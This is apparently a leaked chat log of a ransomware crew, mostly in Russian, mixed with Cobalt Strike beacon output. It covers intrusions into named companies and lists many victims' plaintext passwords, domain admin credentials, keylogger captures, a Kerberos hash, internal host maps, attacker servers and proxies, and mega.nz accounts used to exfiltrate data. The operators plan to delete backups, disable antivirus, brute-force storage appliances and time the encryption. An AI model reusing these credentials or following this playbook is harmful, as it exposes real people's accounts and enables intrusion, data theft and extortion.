URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : waterwayapps@gmail.com
Password : wWj(9WZ&f}#z8}w^

--- Chromium Credential (User: mharper) ---
URL : https://prtg.waterway.com/public/checklogin.htm
Username : mharper@waterway.com
Password : Waterway99

--- Chromium Credential (User: mharper) ---
URL : https://www.deskperk.com/account/login/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL :
Username : markharper.pwlonghorns@gmail.com
Password : 88Maybe253

--- Chromium Credential (User: mharper) ---
URL :
Username : mharper98
Password : 88Maybe253

--- Chromium Credential (User: mharper) ---
URL : https://id.logi.com/
Username : mharper@waterway.com
Password : LoveUnit14%

--- Chromium Credential (User: mharper) ---
URL : https://ncentral.waterway.com/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://ncentral.waterway.com/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL :
Username : mharper@waterway.com
Password : LoveUnit14%

[*] Finished Google Chrome extraction.

[*] Beginning Edge extraction.

--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#

[*] Finished Edge extraction.

[Done.
```
```
[*] Beginning Google Chrome extraction.

--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W

--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU

--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

[*] Finished Google Chrome extraction.

[Done.
```
```
[*] Beginning Google Chrome extraction.


[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL: https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*

--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X

--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew

--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-

--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH

--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123

[*] Finished Google Chrome extraction.

[*] Beginning Edge extraction.

--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r

--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj

--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42

[*] Finished Edge extraction.

[Done.
```
```
[*] Beginning Google Chrome extraction.


[+] received output:
[*] Finished Google Chrome extraction.

[Done.
``прокси только оставьте которую выдали для почтсверните серверные сесии и остальноетут видимо на пнсвежиеснимите мне их браузеры еще разок``
  CurrentUser : WATERWAY\mharper
  Idletime : 00h:46m:59s:672ms (2819672 milliseconds)
```
```
  CurrentUser : WATERWAY\gkeller
  Idletime : 02h:09m:38s:235ms (7778235 milliseconds)
```
```
  CurrentUser : WATERWAY\mapusatera
  Idletime : 06h:51m:32s:968ms (24692968 milliseconds)
```
```
  CurrentUser : WATERWAY\djarden
  Idletime : 03h:05m:02s:093ms (11102093 milliseconds)
```скрины - лок экранбез движения?если не придут то сворачиваем на пнпол часика мониторимна серверах пока сесии усыпите на больший интерваля еще надеюсь что они придутперенесем на пол часика готовностьравновато они свали....это gkeller``
====== IdleTime

  CurrentUser : WATERWAY\gkeller
  Idletime : 01h:43m:42s:781ms (6222781 milliseconds
```минуткуа именно грега остальные живы?бляоф комп7арпер вышел5 мин готовностьнета доступы в слэк есть?@ot проснись тебя потерялидайте скрин с харперагде у нас офистим?скрины делаете регулярно и проверяйте на наличие шухеравы смотрите за админами активнымичерез 10 мин будем писать10 минага отличносервера сейчас притянемеще что было из бэкапов?батники готовы
расшар дисков готов
нимблы открытынимблнцентр и рок спайс на готове[ ](https://mediaeveryone.com/group/waterway-com?msg=Jzd3FE6Gachm5XwXx) ?знаете что подготовить?готовность 10 минс впном пока проблемыдау вас деплой батника же убивает процесы?``
WWDC2.waterway.com [192.168.0.222]
WWDC1.waterway.com [192.168.0.228]
PDIPRODWEB.waterway.com [192.168.0.192]
PDIPRODSQL.waterway.com [192.168.0.191]
PDITESTSQL.waterway.com [192.168.0.127]
WWSQL.waterway.com [192.168.0.189]
WWSQL2.waterway.com [192.168.0.213]
WWSQL02.waterway.com [192.168.0.59]
REPORTING.waterway.com [192.168.0.217]
WWSQL2OLD.waterway.com [192.168.0.83]
PDIPRODWEB2016.waterway.com [192.168.0.60]
WW2K1.waterway.com [192.168.0.204]
WWHV-CLUSTER-1.waterway.com [192.168.0.8]
WWHV-CLUSTER-2.waterway.com [192.168.0.7]
WWHV01.waterway.com [192.168.0.6]
WWHV02.waterway.com [192.168.0.190]
WWHV03.waterway.com [192.168.0.1]
WWHV04.waterway.com [192.168.0.2]
WWHV63.waterway.com [192.168.63.20]
```
сервера``
104.243.37.111 (Windows 2019 Standard x64)
u: Administrator
p: BXj0o3XD8JbXeXH
``````
104.171.117.198 (Windows Server 2012 x64)
u: Administrator
p: l037zI#fU.MX
``````
23.92.210.210
u: Administrator
p: fmsbS4wy6NaASrTu
``кидаю доступы к 3 дедикамnoасус бэкап не нашли?щас пинганем все и готовыспасибо @user4так давно есть уже SharpSharesNGможете сразу подготовить автоматизацию деплоя скрипта расшарыDomain Admins
```
    WATERWAY\djarden MyNewPassword6*
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
    WATERWAY\datavault Waterway727
    WATERWAY\domainrestore Waterway727
    WATERWAY\mapusatera Gators1853
    WATERWAY\veeam_admin 99Waterway
    WATERWAY\Applied Waterway99
    WATERWAY\DBunte Waterway99
    WATERWAY\gkeller Waterway76
    WATERWAY\SEnglert Waterway99!
    WATERWAY\blauer 11915Admin2179!
    WATERWAY\mharper LoveUnit14
``или если дропнуть кобу у вас будет впнсразу запустить билдчтобы если палево начнется (будете мониторить админов)и вы уже будете дежрать сессии на серверах к этому временипоэтому мы прокинем впн в сетьшанс есть)я же сказалне турнут ли нас сразу после письма насчёт нимблов?вопросы?все 5 человек в деле, между собой распределите роливсе по таймингу, надо сделать практически мгновенно всене забывайте про удаление всех внешних бэков которые былина случай если дропнут кобут е вы запускаете на тачке длл, я выдаю вам овпн конфиги + дедик, вы все поднимаете и вот впном в сети2 входные точкина этот случай я готовлю вам впн мосты в сетьважный момент что во время шухера кобу могут выкинуть из сетиа, да, оки мапить даже не придется)армы вы можете расшарить по сетипоэтому тут тайминг очень важенно может подняться шухер и у нас будет мало времени на сам лок[ ](https://mediaeveryone.com/group/waterway-com?msg=idpvE2JA95NfNYsao) + замапленые армы?или лочим без нимблаи лочимлибо мы получаем пасс от нимбла и делаем ремув всех бэкаповтут все просточтобы вы только запустили билдк этому времени у вас должны быть притянуты все сервера в кобуполучили доступы сразу вошли заскринили бэкапы с размером файлов если он имется и удали все что можно``
WWDC2
WWDC1


MSSQL--

PDIPRODWEB
PDIPRODSQL
PDITESTSQL
WWSQL
WWSQL2
WWSQL02
REPORTING
WWSQLOLD
WWSQL2OLD


TERMSRV--

PDITESTWEB
WATERWAYDSC02
WW2K1OLD
PDIPRODWEB2016
WW2K1


Hyper-V Server--

WWHV-CLUSTER-1
WWHV-CLUSTER-2
WWHV01
WWHV02
WWHV03
WWHV04
WWHV63
``и ждете доступы чтобы сделать все за +- 1-2 минутыт е сокс + урл вбитвы готовите сразу доступы в нимблу``
по AD
всего тачек- 310
win serv - 16
hyper-v server - 7
arm - 287
``из тех двух что я скидывалсразу сюда билд дайте одинсколько серверов и пользовательских?окей разбираем стратегиюу тайм аут 30 минутя виделдаdjarden у нее же браузер чекали?mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=eYrHKvzmgSGPvEQs7) чей деск?`MS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!` всё работает, не путай меня`MS.Outlook.15:djarden@waterway.com\djarden@waterway.com DJarden6*`на ней кейлог виситдау нее тачку смотрели же?``
dn:CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>nc: Dianne Jarden
>sn: Jarden
>description: IT
````MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915Admin2179!`сейчас найду валидныеошибкаMS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915ITMan2179! пишет ошибку``
blue
gkeller
mharper
mpusatera
```у кого был нимбл?``
mail.datotel.com\tweiskopf@waterway.com Weiskopf2583#
mail.datotel.com\customercare@waterway.com Wc#2020!
``````
MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915Admin2179!
MS.Outlook.15:djarden@waterway.com\djarden@waterway.com DJarden6*
MS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!
MS.Outlook.15:mharper@waterway.com\mharper@waterway.com LoveUnit14
MS.Outlook.15:mpusatera@waterway.com\mpusatera@waterway.com Gators1853
MS.Outlook.15:tweiskopf@waterway.com\tweiskopf@waterway.com Weiskopf2583*
``@user7 долго еще?мне нужна его почта и почта второго пиздюкатам тикеты на помощь создаются или типо тогоя думаю это HelpDesc*негово всяком случае дёрнул у неоэто mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=ERNTLyZqow7H3bsNB) не думаю что он живой человекони в основном у @user7
он отошёл``
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
```setg Proxies socks4:185.150.189.165:29528дайте пока сокс и доступы для подкл к почтам ребят по нимблув слэке?на почте тихо?в кейлоге ниче нетну если только они по офису бегают и орутне подняли ли шухерадминов помониторьтекак веб так и ссхер там а не брут
в лок улетает ip после +- 10 попытоккак и рутв логиныадмины еще с большой буквыв батник прелоковый вкиньте кил процесса асус бэкап сервисачерез час обсуждаем план действий т к тут подход не тривиальныйда[ ](https://mediaeveryone.com/group/waterway-com?msg=oo9XiRA9tCdeANuK8) небыло еще
сделаем в ближайщее времятут еще был архивчик с файлами?начинаем в 1:30https://192.168.0.75/#/loginна почтея видел только алерт об успешной авторизации за 20-й годтак вы и до этого были алерты?вообще перед брутом вопрос
у них при входе алерт на почту
есть большая вероятность что и на перебор\лок\неверный пас так же будет алерт
стоит ли?
mega.nz

WATERWAY.COM SQL .bak
                 ztclmgplmwfqmcjqfn@wqcefp.com
                 745jkiJIGSFjer67

WATERWAY.COM outlook
                 ribom53736@vy89.com
                 Mdu7IJ8wQ5ktG3HS4Vzuase1314212
``админ администратор и рутлогины этих двух утапковдумаю макс диап 5 вариантовне ясно какой из вариантов логина нужентак проблема ещё в том что я пробовал с разными вариациями логина (с @ \ и просто логин)давайте вернемся к идее брутаговорят что в мониторинге видно что они вг, как и насытак может он вг тогда?)в ад_комп не видатьв ad_computers есть?@user9
```
нимблы:
    https://192.168.0.42
    https://192.168.0.43
    https://192.168.0.75
    https://192.168.0.77
``он разве есть в АД как таковой? нимбл в домене?возможно и неограниченно с другой стороны, сколько попыток логина мы делали на нимблы привязаны к адно по известнымэто в доменеэто на нимбле?``
Lockout threshold: 15

``там неограниченное количество попыток?+ все хеши с домена и побрутимдавайте соберем топ паролей за последние пару летдаже 16вообще в ад и на сервах дикая мусоркаад сняли как сетку далитак и было, по ад17 серверов? а раньше столько и было? или они чет пронюхали?по бэкапам
в сети все компы с "backup" либо не пигуются, либо анричибл
Несколько что живы - только с диском С и там нет бэкапов
Всего 17 сервером, из бэкапов нашел только бэкапы баз,сайт и тд
Чекну конечно еще воркгруп, но такое ощущение что они льют бэкапы в нимбл
либо вобще их не делают :) что вряд ли, т.к компы с припиской бэкап создают впечатление что они восстановлены из бэкапа, поэтому так и называютсятак и спалитесь)```
Teemo[WWSQL]SYSTEM */976|2021Jan15 03:11:21> portscan 192.168.0.105 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on 192.168.0.105
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``````
 Teemo[WWSQL]SYSTEM */976|2021Jan15 03:09:54> shell net view \\192.168.0.105 /all
[*] Tasked beacon to run: net view \\192.168.0.105 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

```нет вью не работает, 3389 нет, другие порты не смотрелрдп?``
Description = The RPC server is unavailable.


``а что с рпс и нет вью?бэкапы без 445``
beacon> shell ping -n 1 CLEBACKUP.waterway.com
[*] Tasked beacon to run: ping -n 1 CLEBACKUP.waterway.com
[+] host called home, sent: 75 bytes
[+] received output:

Pinging CLEBACKUP.waterway.com [192.168.0.105] with 32 bytes of data:
Reply from 192.168.0.105: bytes=32 time=7ms TTL=64

Ping statistics for 192.168.0.105:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 7ms, Average = 7ms

beacon> portscan 192.168.0.105 445,21,22,3389,443
[*] Tasked beacon to scan ports 445,21,22,3389,443 on 192.168.0.105
[+] host called home, sent: 75377 bytes
[+] received output:
(ICMP) Target '192.168.0.105' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
``чекстати
очень интересная штука....но чет не компилится
роюсь к кодеесть вот эта штука в теории должна работать - https://github.com/amitwaisel/Malproxy/tree/master/srcв лабе патченый)
попробовал мимик через сокс и он ожидаемо не сработал
впн не развернуть - кобальтовский не деплоится т.к. вин 10 не поддерживается.
Любой другой впн клиент они не используют.так что попробовать да имет смыслкстати на лабе насколько я помню ДК не патченныйно надо быть полностью увереным что сработает)в принципе можно попробовать это на лабенеа, не пробовал
если сейчас попробую, то будет большой шанс что уже почистят сеть, т.к. если сейчас это не выйдет и второй раз сломается дк - админы что нибудь да заподозрят)``
вот эта строка не работает походу потому что в CS старый мимик
```
а через сокс или впн не пробоват ак завести?по смбгост по сети - пустоОсталось наполнитьПоднял формум, настроил.и завтра к 11отпишите результат работы за сегодня в групымаксимум к 11 можемВсе стоит ехать 1:30Это очень плохое времяа че так рано?завтра к 10до 9сегодня не долгодвигаюсь по компамкак у вас продвигается?сканирую подсети из ad_subnets - ищу где я админчитаю документацию по пш эмпайруотпишите прогресс по задачамсдела че яну как раз будем разбиратсья с тобойполучается такитого только @user8 свободен?я с той же сессиейну раз то окподнимаю фопруму меня asu.eduостальные?видимо, лично у меня пока задачи нетзакончил с впс буквально пару минут назад, по сеткам отписывалчто у вас по задачам?:space_invader:приветвсем приветhi$krb5tgs$23$*Adm-LarsonJa$na.kfy.com$MSSQLSvc/kfi-tfs-01.na.kfy.com 12!Password8eyJhbGciOiJBbRHP0ziz/Of8VMpJoSrB/hdylxGRaD3OpMObBmsS/MPYEu2f+hshrf+Hn2STXGSY/Kdw9lDFIjH++fPGQdYq4VU07fksbbn1xAo83C4krZ6y9YVhj/VYZBydpiCylnlR9wZPij8ju8L94iEv/deJz1hL9N8nlotdZm978lYB24DvXLWkZUu/lMzoA2ZIWTbcg6HyUPbT9DfrX8acmthalXQ1fSYeoX84fdMD+u3UOtkzzCK323IPcekXELFSCa3VeyJhbGciOiJB3XBKfH829UQBLt+p1JFtDtq6HXaZVNbfVvjWcSjVxWxy9i9h2Tqs+7xmLExTnnah80/tWlzVz+931Ljyrmc1ZG/5rlZxyNkna6P98YPxD6FGeBeN68vi3sFPuuBEsWDvEKJXhNusSBlvbK4Eyzh83mFlH9l5LTobXSlcoAk0+Zc=`[22][ssh] host: 89.0.10.104 login: root password: netgear1`
это который NAS-D5-E2-B8только щас)я во всехзайди в другой рока поняла мы кейлоггами их ловими через СИ залететь на нимблбудут звонить писать в водунимбл?в 4 будет нимблтам не раньше 6ладно ты прав, но я добавлю что когда говорил про ехе я закладывал подобные исходы)я не виноват что трик умет дл жрать)не бей лежачего)))))а как же отказ от ехе и нахуй егокак так...ага понял, маякни пожалуйста как там грузить будут - у меня тут перебои с кейсами для онлайников сегодня( им работать не с чем( вот думал с трика взять че-нить а чистого ехе то нету....еще на той неделе договаривались и сегодня уточнялтаргет сказал что будет да?прогруз, откуда хзя читал сегодня какие-то новые кейсы будут? с бк будут грузить?как вы там?приветпривет``
LEEFILTERS.UK
=============


Domain Controllers

LEEPDCVM
LEE-DCON-01

-------------------

Sage/SQL

LEESQL
LEESAGEVM
LEEAPPVM

-------------------

backup server

LEESTORE

-------------------

Qlikview Server
(Qlik provides an end-to-end platform which includes data integration, user-driven business intelligence and conversational analytics)

LEEQLIKVM
QVWEBLIVE
QVAPPLIVE
QVAPPTEST
LEEPUBAPP01

-------------------

EXCHANGE

LEEMAILVM

-------------------

File Storage Server

LEEDATA

-------------------
Replication Server

LEEREP
```пока поиграйтесь с тестированием инструментов пожалуйстаизвините друзья, сессиями пока ступор небольшой, наверное через пару часов решится мб раньшевот бы новых сессий дали (оксейчас постараюсь намутить, бекдор отвалился просто
домен куда отстук былвсе мертвы которые живы были?доброй ночиДобрый вечердобрый деньСессий нет. Новые будут?доброе утро:flag_il:Hiспокойнойвсем спокойной``
https://vpn.floridapoly.edu
```
на дедике под впном
чекнул сеть на ms17\bluekeep\smbghost(выборочно) - все мимо
остался еще варик как-то узнать ДК и проверить его на зерологонпоэтому будем до позднабудем закрывать сетьзавтра к 3отпишите статусы в групынесколько версий пробовал ms17
не канаетПо моей - просканил сеть
есть 1 ```
Host is likely VULNERABLE to MS17-010!
```
но
```
[-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
``отпишите статус в групысделал только 2 снапшотакто закончил рдп отпишите пасс и что можно делать снапшот@tl1 добавь меня к @user4 в группу пожайлустаЖду пока востановишь работу дедика, пакую все данные keepass,а как мне сделать чтобы по 9000 с впном можно было подлкючаться?)
как вчерав дедике копаюсь, впн вчерашней сети разворачиваюкто чем занят?это по настройке рдпне создавайте новых пользователей, меняйте пасс и работайте под текущимне меньшеок, от 2424 мало? а то уже поставилновый пароль минимум от 30 символов, включая буквы цифры и символыу @user4 сеть почти разобрана, надо сегодня с ней закончить. 2 человека ему в помощь будут выделены, там сеть достаточно большаяпоэтому скорее всего сегодня ожидаются сесисразу проверьте настройки питания на ОС чтобы не уходило в сонтогда 10его через месяц не будетя на старомеще 2 человека?3,7,8 скинулможно тот оставить что естьну пусть будет 10любоймне 16все на местенапиши какой дедик хотите (10,16)
я выдаю вам доступы в лс
вы настраивайте под себя, ставите софт и меняет пароль от учетки
скидываете новый пароль учетки мне
я делаю вам снапшот текущего состояния для возможности отката в настроеную стредукак раз уже всеа хотя не будем ждатьдем еще 7 минут остальныхэтот да199.241.189.58 вроде живая - я про нееваши основые которые вам изначально давали остались2 уже забрал которые временные выдавала которая уже есть, е можно оставить?3 вин 10 и 3 вин 16рдп подъехалинет ещевсе пришли?hiдень добрыйвсем привет:space_invader:+ ты снимал с них керб?)тогда другой вопрос: а можно файлы АД трастов для начала?мне определенно стало нравиться как ты пишешь отчет о проделанной работе)в трастовых доменах через
```
smb_version
rhosts="имя_домена"
```
обнаружили чуть больше тачек, чем 1

Тут `mcklrh.mig`:
```
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
[+] 192.168.254.107:445 - Host is running Windows 2003 R2 SP1 (build:3790) (name:NSERV4) (domain:MCKLRH)
```

Тут `ffmg.local`:
```
[+] 10.10.39.73:445 - Host is running Windows 2003 SP2 (build:3790) (name:CLINICDC) (domain:FFMG)
```

Имеющийся ЕА (`svc-aadc`) не имеет админских прав в обоих доменах
```
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:WH20s.admin 1225kofq'
```
```
[+] 10.10.39.73:445 - 10.10.39.73:445 - Success: 'lrhc\svc-aadc:WH20s.admin 1225kofq'
```
Чекал на `ms17`:
Тут `ffmg.local` глухо
Тут `mcklrh.mig `на серваке 2003 уязвимость есть. Добавил ЛА, заспавнить ни в кобе, ни в тпш, ни в метерпретере не вышло.
Пытался снять АДинфо - не вышло. Давал либо 0 объектов, либо повисал, либо c ошибкой` ERROR: 0x1`
Пытался снимать и роняя экзешник, и удалённо через:
```
-b DC=mcklrh,DC=mig
-h 192.168.254.107
```

Нагрузки запускал через `wmic`, `psexec`, `ms17_010_command` - ни ху

Пока что есть только списки ДА и ЕА из домена `mcklrh.mig`

```
The request will be processed at a domain controller for domain mcklrh.mig.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator klr test3
testpacs
The command completed successfully.
```
```
The request will be processed at a domain controller for domain mcklrh.mig.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator ali
The command completed successfully.
```adfind.exe -f "(objectcategory=person)" -h x.x.x> ad_users.txt:thumbsup:чтобы не скучалиэто на случай неудачи по текущим сеткамuser4user7перекину сюда для удобства``
lrhc.local\gsnelson $Gateway56
lrhc.local\nmsapps dragon374
``````
Inbox - gkeller@waterway.com - Outlook
=======
inmbel
``````
Unit64OfficePC - [v. 7.00.21][#50200003524929] [0:00:03]
=======
ST0164[tab]ST0164
``````
https://192.168.63.1:8080/auth/login - Google Chrome
=======
b0ckTh15
admin
```
```
Zoom Meeting
=======
af[backspace]dmin[tab]bl0ckTh15
admin[tab]bl0ckTh15
```
```
Waterway 06 Office - [v. 7.00.21][#10100020974010] [0:00:48]
=======
06Blues
```

походу в зуме пароли передаются
```
New Tab - Google Chrome
=======
Where to find [a[backspace][backspace]password is [backspace][backspace]n zoom
192.168.64.1[left][left][backspace][backspace]63
```


```
Waterway Gas & Wash - Google Chrome
=======
mpusatera@waterway.com[tab]w@terwA[backspace]!y
w@terw@y
Morgan914
Gators1853
1853Gators
mpusatera@waterway.com[tab]w@terw@y
[F12][delete]
mpusatera@waterway.com[tab]w@terw@y
```с 26 до 5вообще планировалсь сегодня до 5с какого? до какого числа будем отдыхать?давайте постараемся и закроеп, я уже на новогодние хочу)мы и завтра вряд ли закроем))ещё собираю инфу по этому всему.тогда завтрасимантек на сервере с авторизацией
сессий с открытым симантеком нетсегодня вряд ли закроем
10 доменов
+ надо креды АВ и сферы где то ловить...https://www.solarwinds.com/it-security-management-toolsда вообще не ав вроде...?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=9dZhAJKePR46j6kT3) .злая хрень?вполнеsolarwinds говорит о чем то?отсалось бэкапы\сферавот же написанокак у вас тут дела?170.7.120.128пока ста выглядит так
+ это домен где мы есть
TECHNISTONE.LOCAL - не получается пролезть, нет пересечений и пользаков\групп из других доменов с правами
WI.RWP.COM какой-то дохлый домен, одни вин 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined
``списки серваков/армов со всех доменов.Herbst2018скиньте хэшик
```
c51ecc215ab741ba8eb53c323bc8c277
```.```
beacon> shell ping polyrey.com
[*] Tasked beacon to run: ping polyrey.com
[+] host called home, sent: 47 bytes
[+] received output:
Ping request could not find host polyrey.com. Please check the name and try again.
```
```
beacon> shell ping resopal.ger
[*] Tasked beacon to run: ping resopal.ger
[+] host called home, sent: 63 bytes
[+] received output:
Ping request could not find host resopal.ger. Please check the name and try again.
``````
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined

``тогда вариант со сканерамив общем они дохнут быстротак вот в них и не закрывали ничегоили по истечению пары дней с поднятым листенеромновые считаются до того как вы в ней сеть закрылиэто бывает когда базы быстро обновляютя почему кипиш то навел
вчера было две новых кобы и в эти две новых кобы ничего не летелода неужели)так, а в новую кобу то летит)с командами и прочимдайте еще сисинфо того сервера за дк и открыта ли у него внешка)) ага, две кобы было открыто, выбрал https, а он из другой кобы)на другую кобу что ли?)ты на какой собрал то?)у тебя графа листенеров пустаяневнимательность так сказатьесли что я это))на какой листенер поднял?)` *** 23623423 has joined.`я тоже в ахуе)лол)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=qWzDq9uNAzyugQTq7) то за дк был 2016в новой хоть кто нибудь новый листенер поднял?вот тот что был за дк тоже 12?длл из новой кобы - то же самоеи так и тактак вы же сказали что запускали на 1 сервере внутри сети через дк?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=Gi5oBnXfNwZvCKHaY) из головного не видно, из другово виднона дк и запускали[ ](https://mediaeveryone.com/group/wilsonart-com?msg=2tfBQPqopYGz2bZyZ) да`resopal.lan`
```
 beacon> shell dir \\172.22.198.11\C$
[*] Tasked beacon to run: dir \\172.22.198.11\C$
[+] host called home, sent: 53 bytes
[+] received output:
The trust relationship between the primary domain and the trusted domain failed.

```Или
regsvr32 file.dllЗапускать:
rundll32 file.dll, StartWдайте команду запуска длл Депатам где запускали за дк тоже был 12?даникакой сервер напрямую не видно?пытался, дл вроде работала на сервере из этого домена, но сессии небыло[ ](https://mediaeveryone.com/group/wilsonart-com?msg=zBMzgRhYxLtjfEr7S) через дк дальше пролезть?видитвнешку?вчера один скидывал в #toolspanelдайте еще сисинфо этих серверова я чисто тестирую исключаю варианты)я конечно попробую, но чисто мое мнение) что дело не в кобе а в том что наши дл не работают на этих 2012 дкпоробуйте сюдачистая коба``
108.62.12.143
https://askside.com
----------------------------------------------------------------------------------------
104.194.10.161:53256
KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi
```нету, только симантекзакрывать это уже отрубить везде АВ через админку и зайти спокойно, там помимо ав что естЬ? оно не всего показывает как АВ, может быть сканер или сенсоркак закрывать то его)чтобы в домен прооезть))везде отключена возможноть полного отлючения аввам для чего сессия?хотя есть риск что админы увидят обрыв с агентомнет правполностью отключить защиту и притянуть биндпайпом и поднять обратно?но я заметил что крашится дл только на 2012на тех что отработало
добавля в исключения и запускал после того как ав прошелся - сесия прилеталадлка от дэпа не удалятся но крашится
наша длл палилась, добавил в исключения, запускается и крашитсяпоследо того как по мнему ав прошелся?на нектороых дл запустилась после этого и сесия прилетелая добавлял дл в исключения авкак следствие крашскорее всего детектит шелкод и вырезает из длзашел по рдп
запустил дл
вылезло окно - прекрашена работа....как определи что именно крашится?но это рискованно и нужно сразу тогда все добиватькак альтернатива рубить симантек (он админится из головного домена)
и пробовать биндпайпом тянуть другие домены[ ](https://mediaeveryone.com/group/wilsonart-com?msg=KoqSvFWfFHfCdEq3Q) нам сейчас решать вопрос, иначе не закроем сегодня еевообщем вот трастмап
всего 14 доменов
в 4 есть сесии
в 7 есть доступы, но оттуда не летят сессии``
>description: Veeam Backup Server
>dNSHostName: bod01-bkp01.eu.Wilsonart.com
``````
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com
``````
